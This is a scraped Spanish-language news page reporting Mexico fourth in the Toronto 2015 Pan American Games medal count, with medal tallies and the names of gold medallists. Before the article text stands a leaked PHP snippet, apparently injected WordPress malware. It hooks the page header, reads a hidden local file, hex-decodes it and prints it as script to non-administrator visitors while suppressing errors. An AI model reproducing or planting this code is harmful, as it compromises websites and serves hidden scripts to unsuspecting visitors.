if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } México marcha 4º en el conteo de medallas de los juegos Panamericanos Toronto 2015 – Reporte Noreste
Conéctate con nosotros

Después de 2 días de competencias en los juegos Panamericanos de Toronto 2015, la delegación mexicana se encuentra en la cuarta posición del conteo de medallas, con un total de 18 preseas, 4 doradas, 6 de plata y 8 de bronce.

El país anfitrión Canadá tiene un total de 24, 10 de ellas de oro y ocupa la primera posición, mientras que Estados Unidos en la segunda con 7 doradas para un total de 19 y en tercera posición Colombia que apenas registra 14 preseas pero con 6 de oro, dos más que México.

Iván García, Rommel Pacheco y Paola Espinoza de clavados, además de Crisanto Grajales Triatlón han obtenido el primer lugar de sus disciplinas, brindando el 4 lugar del medallero para México.

 

Foto/@CONADE

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Sin categoría